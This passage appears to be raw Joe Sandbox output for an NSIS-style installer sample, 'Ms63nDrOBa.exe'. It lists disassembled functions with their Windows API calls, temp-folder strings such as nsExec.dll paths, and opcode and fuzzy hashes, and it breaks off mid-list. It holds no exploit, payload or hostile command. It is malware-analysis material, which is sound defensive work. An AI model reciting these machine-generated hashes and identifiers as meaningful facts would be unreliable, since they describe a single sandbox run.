                                                  • CompareFileTime.KERNEL32(-00000014,?,10.0.19045.False,10.0.19045.False,00000000,00000000,10.0.19045.False,C:\Users\user\AppData\Local\Temp\nse5B61.tmp,?,?,00000031), ref: 004017DA
                                                    • Part of subcall function 00406534: lstrcpynW.KERNEL32(?,?,00000400,00403681,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406541
                                                    • Part of subcall function 004055B9: lstrlenW.KERNEL32(007A0728,00000000,0079B1EE,762323A0,?,?,?,?,?,?,?,?,?,004033FA,00000000,?), ref: 004055F1
                                                    • Part of subcall function 004055B9: lstrlenW.KERNEL32(004033FA,007A0728,00000000,0079B1EE,762323A0,?,?,?,?,?,?,?,?,?,004033FA,00000000), ref: 00405601
                                                    • Part of subcall function 004055B9: lstrcatW.KERNEL32(007A0728,004033FA), ref: 00405614
                                                    • Part of subcall function 004055B9: SetWindowTextW.USER32(007A0728,007A0728), ref: 00405626
                                                    • Part of subcall function 004055B9: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040564C
                                                    • Part of subcall function 004055B9: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405666
                                                    • Part of subcall function 004055B9: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405674
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: 10.0.19045.False$C:\Users\user\AppData\Local\Temp\nse5B61.tmp$C:\Users\user\AppData\Local\Temp\nse5B61.tmp\nsExec.dll
                                                  • API String ID: 1941528284-796677359
                                                  • Opcode ID: 8561651abfa6410071d22ed99cb99f5f230de9881640b0fdfe788bbeaf189928
                                                  • Instruction ID: f453ba81f7058b6188de9b36fe697e27c0e04e304a513fa9e8a23dac1ec640eb
                                                  • Opcode Fuzzy Hash: 8561651abfa6410071d22ed99cb99f5f230de9881640b0fdfe788bbeaf189928
                                                  • Instruction Fuzzy Hash: C741C631800518BACF11BBB9DC85DBE3AB5EF41729B21423FF012B10E2DB3C8A51966D

                                                  Control-flow Graph (graph image not captured; function entry block 4032b9)
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: CountTick$wsprintf
                                                  • String ID: ... %d%%$CGy
                                                  • API String ID: 551687249-3591958535
                                                  • Opcode ID: 35df2eeb44d66dae63b1d0c24c026509dc1c2a142cef09f029ae2f44a6fc0423
                                                  • Instruction ID: 8b929f0044e1ac0cacba81bf46ea48fcc998b80fd55e06c59bd949555b0c30d1
                                                  • Opcode Fuzzy Hash: 35df2eeb44d66dae63b1d0c24c026509dc1c2a142cef09f029ae2f44a6fc0423
                                                  • Instruction Fuzzy Hash: E5515F71900219DBCF11CF95D98469F7FA8AF4076AF14417BE804BB2C0C77C9A50CBAA

                                                  Control-flow Graph (graph image not captured; function entry block 405f0b)
                                                  APIs
                                                    • Part of subcall function 00406534: lstrcpynW.KERNEL32(?,?,00000400,00403681,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406541
                                                    • Part of subcall function 00405EAE: CharNextW.USER32(?,?,007A3F50,?,00405F22,007A3F50,007A3F50, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C60,?,76233420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405EBC
                                                    • Part of subcall function 00405EAE: CharNextW.USER32(00000000), ref: 00405EC1
                                                    • Part of subcall function 00405EAE: CharNextW.USER32(00000000), ref: 00405ED9
                                                  • lstrlenW.KERNEL32(007A3F50,00000000,007A3F50,007A3F50, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C60,?,76233420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405F64
                                                  • GetFileAttributesW.KERNELBASE(007A3F50,007A3F50,007A3F50,007A3F50,007A3F50,007A3F50,00000000,007A3F50,007A3F50, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C60,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 00405F74
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                  • String ID: 4#v$C:\Users\user\AppData\Local\Temp\$P?z
                                                  • API String ID: 3248276644-4140600528
                                                  • Opcode ID: bcbf200ecc0ebcd9a110e0aedcb8263399075ff3aca88ce7f3d60eb64f48f27a
                                                  • Instruction ID: 4254dd577ef462a113b6af6603d7003c895b553eaebd6861c82524aaccd31353
                                                  • Opcode Fuzzy Hash: bcbf200ecc0ebcd9a110e0aedcb8263399075ff3aca88ce7f3d60eb64f48f27a
                                                  • Instruction Fuzzy Hash: 12F02835105E5329D622333A6C05AAF1544CFC6368719067BF892B22D5CF3C8B438CBE

                                                  Control-flow Graph (graph image not captured; function entry block 4068b8)
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068CF
                                                  • wsprintfW.USER32 ref: 0040690A
                                                  • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040691E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                  • String ID: %s%S.dll$UXTHEME
                                                  • API String ID: 2200240437-1106614640
                                                  • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                  • Instruction ID: 81ed32cd441a27d4f3f8ebc13d3c3c121413d11d2ad97d4a1e4b49bf3134d0f2
                                                  • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                  • Instruction Fuzzy Hash: 64F0FC31501219AACB10BB64DD0DF9B375C9B00305F10847AA646F10D0EB78D668C798

                                                  Control-flow Graph (graph image not captured; function entry block 406053)
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00406071
                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040350D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9), ref: 0040608C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-1857211195
                                                  • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                  • Instruction ID: c38105da250e7271fccf8508e97940083eab768234b1f6861d150eb6f31dd2f1
                                                  • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                  • Instruction Fuzzy Hash: 27F09076B40204BBEB00CF69ED05F9EB7ACEB95750F11803AFA01F7180E6B0A9548768

                                                  Control-flow Graph (graph image not captured; function entry block 4015c6)
                                                  APIs
                                                    • Part of subcall function 00405EAE: CharNextW.USER32(?,?,007A3F50,?,00405F22,007A3F50,007A3F50, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C60,?,76233420,C:\Users\user\AppData\Local\Temp\,007B3000), ref: 00405EBC
                                                    • Part of subcall function 00405EAE: CharNextW.USER32(00000000), ref: 00405EC1
                                                    • Part of subcall function 00405EAE: CharNextW.USER32(00000000), ref: 00405ED9
                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                    • Part of subcall function 00405A88: CreateDirectoryW.KERNELBASE(007AB800,?), ref: 00405ACA
                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\nse5B61.tmp,?,00000000,000000F0), ref: 00401652
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\nse5B61.tmp, xrefs: 00401645
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nse5B61.tmp
                                                  • API String ID: 1892508949-460192656
                                                  • Opcode ID: 4c19b764ac487a517b4bd13167095bd853d569a08c8d607eac6b17a03d538d9d
                                                  • Instruction ID: 625a4e517e3d2ef51acfe74bc6df62a7a1d29dad7f850d028ad858b28003b980
                                                  • Opcode Fuzzy Hash: 4c19b764ac487a517b4bd13167095bd853d569a08c8d607eac6b17a03d538d9d
                                                  • Instruction Fuzzy Hash: 3611D031504114ABCF206FA5CD405AF36A0EF04368B29493FE945B22F1DA3D4A819B4E

                                                  Control-flow Graph (graph image not captured; function entry block 4020dd)
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402108
                                                    • Part of subcall function 004055B9: lstrlenW.KERNEL32(007A0728,00000000,0079B1EE,762323A0,?,?,?,?,?,?,?,?,?,004033FA,00000000,?), ref: 004055F1
                                                    • Part of subcall function 004055B9: lstrlenW.KERNEL32(004033FA,007A0728,00000000,0079B1EE,762323A0,?,?,?,?,?,?,?,?,?,004033FA,00000000), ref: 00405601
                                                    • Part of subcall function 004055B9: lstrcatW.KERNEL32(007A0728,004033FA), ref: 00405614
                                                    • Part of subcall function 004055B9: SetWindowTextW.USER32(007A0728,007A0728), ref: 00405626
                                                    • Part of subcall function 004055B9: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040564C
                                                    • Part of subcall function 004055B9: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405666
                                                    • Part of subcall function 004055B9: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405674
                                                  • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402119
                                                  • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 00402196
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 334405425-0

                                                   Control-flow Graph (graph image not reproduced)
                                                  APIs
                                                  • GlobalFree.KERNEL32(00893338), ref: 00401C10
                                                  • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C22
                                                  Strings
                                                  Similarity
                                                  • API ID: Global$AllocFree
                                                  • String ID: 10.0.19045.False
                                                  • API String ID: 3394109436-2006975710

                                                   Control-flow Graph (graph image not reproduced)
                                                  APIs
                                                    • Part of subcall function 00405FFF: GetFileAttributesW.KERNELBASE(?,?,00405C04,?,?,00000000,00405DDA,?,?,?,?), ref: 00406004
                                                    • Part of subcall function 00405FFF: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406018
                                                  • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405DDA), ref: 00405C13
                                                  • DeleteFileW.KERNELBASE(?,?,?,00000000,00405DDA), ref: 00405C1B
                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C33
                                                  Similarity
                                                  • API ID: File$Attributes$DeleteDirectoryRemove
                                                  • String ID:
                                                  • API String ID: 1655745494-0

                                                   Control-flow Graph (graph image not reproduced)
                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0

                                                   Control-flow Graph (graph image not reproduced)
                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(007AB800,?), ref: 00405ACA
                                                  • GetLastError.KERNEL32 ref: 00405AD8
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,0040361F,0000000C,?,?,?,?,?,?,?,?), ref: 0040693A
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406955
                                                    • Part of subcall function 004068B8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068CF
                                                    • Part of subcall function 004068B8: wsprintfW.USER32 ref: 0040690A
                                                    • Part of subcall function 004068B8: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040691E
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID:
                                                  • API String ID: 2547128583-0
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\Ms63nDrOBa.exe,80000000,00000003), ref: 00406028
                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040604A
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,?,00405C04,?,?,00000000,00405DDA,?,?,?,?), ref: 00406004
                                                  • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406018
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  APIs
                                                  • CloseHandle.KERNEL32(FFFFFFFF,00403A5F,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403B37
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\nse5B61.tmp\, xrefs: 00403B4B
                                                  Similarity
                                                  • API ID: CloseHandle
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\
                                                  • API String ID: 2962429428-1087048941
                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00403502,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00405AE8
                                                  • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405AF6
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  APIs
                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040347A,00000000,00793700,000000FF,00793700,000000FF,000000FF,00000004,00000000), ref: 004060EA
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  APIs
                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034C4,00000000,00000000,0040330B,000000FF,00000004,00000000,00000000,00000000), ref: 004060BB
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  APIs
                                                  • MoveFileExW.KERNELBASE(?,?,00000005,00405DF2,?,00000000,000000F1,?,?,?,?,?), ref: 004062FE
                                                    • Part of subcall function 0040617A: CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406315,?,?), ref: 004061B5
                                                    • Part of subcall function 0040617A: GetShortPathNameW.KERNEL32(?,007A4DE8,00000400), ref: 004061BE
                                                    • Part of subcall function 0040617A: GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 004061DB
                                                    • Part of subcall function 0040617A: wsprintfA.USER32 ref: 004061F9
                                                    • Part of subcall function 0040617A: GetFileSize.KERNEL32(00000000,00000000,007A55E8,C0000000,00000004,007A55E8,?,?,?,?,?), ref: 00406234
                                                    • Part of subcall function 0040617A: GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406243
                                                    • Part of subcall function 0040617A: lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040627B
                                                    • Part of subcall function 0040617A: SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A49E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062D1
                                                  Similarity
                                                  • API ID: File$NamePathShort$AllocCloseGlobalHandleMovePointerSizelstrcpywsprintf
                                                  • String ID:
                                                  • API String ID: 1930046112-0
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034D5
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 00405756
                                                  • GetDlgItem.USER32(?,000003EE), ref: 00405765
                                                  • GetClientRect.USER32(?,?), ref: 004057A2
                                                  • GetSystemMetrics.USER32(00000002), ref: 004057A9
                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057CA
                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057DB
                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057EE
                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057FC
                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040580F
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405831
                                                  • ShowWindow.USER32(?,00000008), ref: 00405845
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405866
                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405876
                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040588F
                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040589B
                                                  • GetDlgItem.USER32(?,000003F8), ref: 00405774
                                                    • Part of subcall function 004044E8: SendMessageW.USER32(00000028,?,00000001,00404313), ref: 004044F6
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004058B8
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000568C,00000000), ref: 004058C6
                                                  • CloseHandle.KERNEL32(00000000), ref: 004058CD
                                                  • ShowWindow.USER32(00000000), ref: 004058F1
                                                  • ShowWindow.USER32(?,00000008), ref: 004058F6
                                                  • ShowWindow.USER32(00000008), ref: 00405940
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405974
                                                  • CreatePopupMenu.USER32 ref: 00405985
                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405999
                                                  • GetWindowRect.USER32(?,?), ref: 004059B9
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059D2
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A0A
                                                  • OpenClipboard.USER32(00000000), ref: 00405A1A
                                                  • EmptyClipboard.USER32 ref: 00405A20
                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A2C
                                                  • GlobalLock.KERNEL32(00000000), ref: 00405A36
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A4A
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405A6A
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405A75
                                                  • CloseClipboard.USER32 ref: 00405A7B
                                                  Strings
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: {
                                                  • API String ID: 590372296-366298937
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 004049F3
                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404A1D
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404ACE
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404AD9
                                                  • lstrcmpiW.KERNEL32(007A6200,007A1748,00000000,?,?), ref: 00404B0B
                                                  • lstrcatW.KERNEL32(?,007A6200), ref: 00404B17
                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B29
                                                    • Part of subcall function 00405B78: GetDlgItemTextW.USER32(?,?,00000400,00404B60), ref: 00405B8B
                                                    • Part of subcall function 004067E2: CharNextW.USER32(?,*?|<>/":,00000000,007B3000,76233420,C:\Users\user\AppData\Local\Temp\,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00406845
                                                    • Part of subcall function 004067E2: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406854
                                                    • Part of subcall function 004067E2: CharNextW.USER32(?,007B3000,76233420,C:\Users\user\AppData\Local\Temp\,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 00406859
                                                    • Part of subcall function 004067E2: CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037F9,?,00000008,0000000A,0000000C), ref: 0040686C
                                                  • GetDiskFreeSpaceW.KERNEL32(0079F718,?,?,0000040F,?,0079F718,0079F718,?,00000001,0079F718,?,?,000003FB,?), ref: 00404BEC
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C07
                                                    • Part of subcall function 00404D60: lstrlenW.KERNEL32(007A1748,007A1748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E01
                                                    • Part of subcall function 00404D60: wsprintfW.USER32 ref: 00404E0A
                                                    • Part of subcall function 00404D60: SetDlgItemTextW.USER32(?,007A1748), ref: 00404E1D
                                                  Strings
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: A
                                                  • API String ID: 2624150263-3554254475
                                                  APIs
                                                  • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\nse5B61.tmp, xrefs: 0040226E
                                                  Similarity
                                                  • API ID: CreateInstance
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nse5B61.tmp
                                                  • API String ID: 542301482-460192656
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: dca364261a257630479412f8d24045f74174dcbea33d49aeb6f7c432ef55f1d3
                                                  • Instruction ID: a3e640cb8dc0d2d7f963ac08cc51882bce801df3f972718032989310b2356a06
                                                  • Opcode Fuzzy Hash: dca364261a257630479412f8d24045f74174dcbea33d49aeb6f7c432ef55f1d3
                                                  • Instruction Fuzzy Hash: 82F05E71904104AAD701EBA4EA499AEB378EF14314F60457BE102F21E0DBB849119B1A
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404F38
                                                  • GetDlgItem.USER32(?,00000408), ref: 00404F43
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F8D
                                                  • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FA4
                                                  • SetWindowLongW.USER32(?,000000FC,0040552D), ref: 00404FBD
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FD1
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FE3
                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404FF9
                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405005
                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405017
                                                  • DeleteObject.GDI32(00000000), ref: 0040501A
                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405045
                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405051
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050EC
                                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040511C
                                                    • Part of subcall function 004044E8: SendMessageW.USER32(00000028,?,00000001,00404313), ref: 004044F6
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405130
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0040515E
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040516C
                                                  • ShowWindow.USER32(?,00000005), ref: 0040517C
                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405277
                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052DC
                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052F1
                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405315
                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405335
                                                  • ImageList_Destroy.COMCTL32(?), ref: 0040534A
                                                  • GlobalFree.KERNEL32(?), ref: 0040535A
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053D3
                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 0040547C
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040548B
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004054B6
                                                  • ShowWindow.USER32(?,00000000), ref: 00405504
                                                  • GetDlgItem.USER32(?,000003FE), ref: 0040550F
                                                  • ShowWindow.USER32(00000000), ref: 00405516
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2284404111.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2284373469.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284436005.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A3000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284467700.00000000007B4000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2284896999.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Ms63nDrOBa.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 2564846305-813528018
                                                  • Opcode ID: 63eace971b309785bb82105d1f3aa94bb5e313571b6fc2e62422463636cbee33
                                                  • Instruction ID: 407b5383e9f0600e1b6d0dc6c9775fd3f0ad17fb7be6f4e7eeeed7564f32b1fa
                                                  • Opcode Fuzzy Hash: 63eace971b309785bb82105d1f3aa94bb5e313571b6fc2e62422463636cbee33
                                                  • Instruction Fuzzy Hash: F0028A70900608AFDF20DF65DD85AAF7BB5FB85314F10816AF610BA2E1D7798A41CF58
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FF0
                                                  • ShowWindow.USER32(?), ref: 00404010
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404022
                                                  • ShowWindow.USER32(?,00000004), ref: 0040403B
                                                  • DestroyWindow.USER32 ref: 0040404F
                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404068
                                                  • GetDlgItem.USER32(?,?), ref: 00404087
                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040409B
                                                  • IsWindowEnabled.USER32(00000000), ref: 004040A2
                                                  • GetDlgItem.USER32(?,00000001), ref: 0040414D
                                                  • GetDlgItem.USER32(?,00000002), ref: 00404157
